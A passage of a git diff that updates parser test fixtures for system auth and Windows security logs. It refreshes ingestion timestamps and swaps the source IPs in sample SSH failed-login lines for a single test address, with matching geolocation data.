"2021-07-30T21:06:01.625025053Z", + "ingested": "2021-12-09T13:45:36.404486400Z", "category": [ "iam" ], @@ -4076,7 +4076,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625025454Z", + "ingested": "2021-12-09T13:45:36.404491100Z", "timezone": "+0000", "kind": "event" }, @@ -4103,7 +4103,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625091777Z", + "ingested": "2021-12-09T13:45:36.404497700Z", "timezone": "+0000", "kind": "event" }, @@ -4132,7 +4132,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625092682Z", + "ingested": "2021-12-09T13:45:36.404501200Z", "timezone": "+0000", "kind": "event" }, @@ -4172,7 +4172,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625093148Z", + "ingested": "2021-12-09T13:45:36.404506100Z", "timezone": "+0000", "kind": "event" }, @@ -4207,7 +4207,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625093587Z", + "ingested": "2021-12-09T13:45:36.404511Z", "timezone": "+0000", "kind": "event" }, @@ -4243,7 +4243,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625094037Z", + "ingested": "2021-12-09T13:45:36.404516100Z", "timezone": "+0000", "kind": "event" }, @@ -4283,7 +4283,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625094429Z", + "ingested": "2021-12-09T13:45:36.404521200Z", "timezone": "+0000", "kind": "event" }, @@ -4318,7 +4318,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625094830Z", + "ingested": "2021-12-09T13:45:36.404525100Z", "timezone": "+0000", "kind": "event" }, @@ -4354,7 +4354,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625095234Z", + "ingested": "2021-12-09T13:45:36.404530200Z", "timezone": "+0000", "kind": "event" }, @@ -4399,7 +4399,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.625095627Z", + "ingested": "2021-12-09T13:45:36.404534500Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -4441,7 +4441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625096015Z", + "ingested": "2021-12-09T13:45:36.404539300Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log index d1bea07e2a2..0690ce504af 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log @@ -1,9 +1,9 @@ Feb 21 21:54:44 localhost sshd[3402]: Accepted publickey for vagrant from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84 Feb 23 00:13:35 localhost sshd[7483]: Accepted password for vagrant from 192.168.33.1 port 58803 ssh2 Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2 -Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2 +Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 89.160.20.156 port 29160 ssh2 Feb 21 23:35:33 localhost sudo: vagrant : TTY=pts/0 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls -Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 123.57.245.163 +Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 89.160.20.156 Feb 23 00:08:48 localhost sudo: vagrant : TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/cat /var/log/secure Feb 24 00:13:02 precise32 sudo: tsg : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls Feb 22 11:47:05 localhost groupadd[6991]: new group: name=apache, GID=48 diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index 71ac4cdb912..97c714057b9 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -37,7 +37,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:02.841786810Z", + "ingested": "2021-12-09T13:45:42.694570800Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -91,7 +91,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-07-30T21:06:02.841789488Z", + "ingested": "2021-12-09T13:45:42.694579100Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -143,7 +143,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:02.841789953Z", + "ingested": "2021-12-09T13:45:42.694584600Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -182,7 +182,7 @@ "slave22" ], "ip": [ - "116.31.116.24" + "89.160.20.156" ] }, "ecs": { @@ -193,27 +193,28 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-GD", - "country_name": "China", - "region_name": "Guangdong", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 113.25, - "lat": 23.1167 - }, - "country_iso_code": "CN" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 134764, + "number": 29518, "organization": { - "name": "CHINANET Guangdong province network" + "name": "Bredband2 AB" } }, "port": 29160, - "ip": "116.31.116.24" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-07-30T21:06:02.841790358Z", + "ingested": "2021-12-09T13:45:42.694589900Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -261,7 +262,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:02.841790793Z", + "ingested": "2021-12-09T13:45:42.694595300Z", "timezone": "+0000", "kind": "event" }, @@ -280,7 +281,7 @@ "system": { "auth": { "ssh": { - "dropped_ip": "123.57.245.163" + "dropped_ip": "89.160.20.156" } } }, @@ -290,7 +291,7 @@ "slave22" ], "ip": [ - "123.57.245.163" + "89.160.20.156" ] }, "ecs": { @@ -301,27 +302,27 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-ZJ", - "city_name": "Hangzhou", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Zhejiang", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 120.1619, - "lat": 30.294 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 37963, + "number": 29518, "organization": { - "name": "Hangzhou Alibaba Advertising Co.,Ltd." + "name": "Bredband2 AB" } }, - "ip": "123.57.245.163" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-07-30T21:06:02.841791189Z", + "ingested": "2021-12-09T13:45:42.694600700Z", "timezone": "+0000", "kind": "event" } @@ -357,7 +358,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:02.841791580Z", + "ingested": "2021-12-09T13:45:42.694605900Z", "timezone": "+0000", "kind": "event" }, @@ -400,7 +401,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:02.841791990Z", + "ingested": "2021-12-09T13:45:42.694611200Z", "timezone": "+0000", "kind": "event" }, @@ -432,7 +433,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:02.841792403Z", + "ingested": "2021-12-09T13:45:42.694616600Z", "category": [ "iam" ], @@ -478,7 +479,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:02.841792795Z", + "ingested": "2021-12-09T13:45:42.694621900Z", "category": [ "iam" ], diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log index 4a33e9e09a1..f22060fef5b 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log @@ -1,7 +1,7 @@ -Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 202.109.143.106 port 1786 ssh2 +Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 89.160.20.156 port 1786 ssh2 Feb 22 16:45:20 slave22 sshd[2738]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:45:26 slave22 sshd[2738]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root Feb 22 16:45:26 slave22 sshd[2738]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root Feb 22 17:04:51 slave22 sudo: tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cp /var/log/secure . diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json index 09825acd254..2cd21b406b8 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json @@ -22,7 +22,7 @@ "slave22" ], "ip": [ - "202.109.143.106" + "89.160.20.156" ] }, "ecs": { @@ -33,27 +33,28 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JX", - "country_name": "China", - "region_name": "Jiangxi", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 115.9333, - "lat": 28.55 - }, - "country_iso_code": "CN" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 4134, + "number": 29518, "organization": { - "name": "No.31,Jin-rong Street" + "name": "Bredband2 AB" } }, "port": 1786, - "ip": "202.109.143.106" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-07-30T21:06:02.976688996Z", + "ingested": "2021-12-09T13:45:43.392072100Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -94,7 +95,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976691519Z", + "ingested": "2021-12-09T13:45:43.392079Z", "timezone": "+0000", "kind": "event" }, @@ -124,7 +125,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976692023Z", + "ingested": "2021-12-09T13:45:43.392082800Z", "timezone": "+0000", "kind": "event" }, @@ -151,11 +152,11 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976692470Z", + "ingested": "2021-12-09T13:45:43.392087500Z", "timezone": "+0000", "kind": "event" }, - "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root" + "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root" }, { "process": { @@ -178,7 +179,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976692871Z", + "ingested": "2021-12-09T13:45:43.392091200Z", "timezone": "+0000", "kind": "event" }, @@ -205,11 +206,11 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976693277Z", + "ingested": "2021-12-09T13:45:43.392095700Z", "timezone": "+0000", "kind": "event" }, - "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root" + "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root" }, { "process": { @@ -242,7 +243,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-07-30T21:06:02.976693687Z", + "ingested": "2021-12-09T13:45:43.392101200Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json index 60373130477..024b2254770 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json @@ -24,7 +24,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:03.074170376Z", + "ingested": "2021-12-09T13:45:43.747682Z", "timezone": "+0000", "kind": "event" }, @@ -57,7 +57,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-07-30T21:06:03.074173019Z", + "ingested": "2021-12-09T13:45:43.747690700Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json index 5121f7a7daf..f5f8681e353 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:03.210685383Z", + "ingested": "2021-12-09T13:45:43.972797500Z", "code": "1100", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json index fd9d2cf1af5..dd880a80804 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json @@ -58,7 +58,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:03.277567227Z", + "ingested": "2021-12-09T13:45:44.108025700Z", "code": "1102", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json index 00edb676c4b..209697bd443 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:03.363927318Z", + "ingested": "2021-12-09T13:45:44.290473500Z", "code": "1104", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json index c5a5cacc050..229ed6b96ef 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json @@ -48,7 +48,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:03.430369089Z", + "ingested": "2021-12-09T13:45:44.408439300Z", "code": "1105", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json index 431e11e5642..0a2df7e9eae 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json @@ -74,7 +74,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-11-11T21:31:58.908808600Z", + "ingested": "2021-12-09T13:45:44.539859Z", "code": "4663", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json index bf4eb4c0808..9c85d035dd3 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json @@ -73,7 +73,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:03.507902320Z", + "ingested": "2021-12-09T13:45:44.690319700Z", "code": "4670", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json index 98f2ff26a00..469ff90b096 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json @@ -78,7 +78,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-11-11T21:31:59.255100300Z", + "ingested": "2021-12-09T13:45:44.903413300Z", "code": "4674", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json index 9b1bdbd890e..54b8be2335c 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:03.604639736Z", + "ingested": "2021-12-09T13:45:45.106391100Z", "code": "4706", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json index 8d182b50c70..5b16cece242 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:03.728582773Z", + "ingested": "2021-12-09T13:45:45.304077500Z", "code": "4707", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json index 06305b42335..d79374ea1ce 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:03.821134433Z", + "ingested": "2021-12-09T13:45:45.483796500Z", "code": "4713", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json index 9b08bd8a0ca..14e520329c0 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:03.907403986Z", + "ingested": "2021-12-09T13:45:45.661333200Z", "code": "4716", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json index 3812504773b..0eda1467ded 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-07-30T21:06:04.009850915Z", + "ingested": "2021-12-09T13:45:45.852303500Z", "code": "4717", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json index 86dad902f97..35e09f28bef 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-07-30T21:06:04.108098395Z", + "ingested": "2021-12-09T13:45:46.036199Z", "code": "4718", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json index 623b7595f69..cbe653566e4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:04.210865594Z", + "ingested": "2021-12-09T13:45:46.213355200Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json index 531748ad56e..33448147c89 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:04.305804272Z", + "ingested": "2021-12-09T13:45:46.399837400Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json index e9b2bfa88b3..bb727351068 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json @@ -66,7 +66,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:04.395925335Z", + "ingested": "2021-12-09T13:45:46.588490400Z", "code": "4739", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json index ba1a5882843..5b1f65f4192 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json @@ -68,7 +68,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:04.486864362Z", + "ingested": "2021-12-09T13:45:46.772189Z", "code": "4743", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json index b70044a19c8..ba037feef6c 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:04.577585617Z", + "ingested": "2021-12-09T13:45:46.953035400Z", "code": "4744", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json index f43fcad8709..0f4f115b078 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:04.673943592Z", + "ingested": "2021-12-09T13:45:47.159830400Z", "code": "4745", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json index 53b8272dc4a..080211b5cbb 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:16.331823600Z", + "ingested": "2021-12-09T13:45:47.362122900Z", "code": "4746", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json index cc50850b535..6747dcd6d3b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:16.621125Z", + "ingested": "2021-12-09T13:45:47.619501500Z", "code": "4747", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json index ba4efecabb9..5284df6be39 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.001219691Z", + "ingested": "2021-12-09T13:45:47.872340400Z", "code": "4748", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json index 3ce9e8d951b..664c3099fc3 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.091820461Z", + "ingested": "2021-12-09T13:45:48.060639100Z", "code": "4749", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json index bf48d48d9eb..c1269a77ab7 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.199584474Z", + "ingested": "2021-12-09T13:45:48.257955300Z", "code": "4750", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json index 6a73c84145e..8dfdfc48e48 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:17.565769200Z", + "ingested": "2021-12-09T13:45:48.462964900Z", "code": "4751", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json index d304bdf51ba..442e3fd7d1b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json @@ -64,7 +64,7 @@ 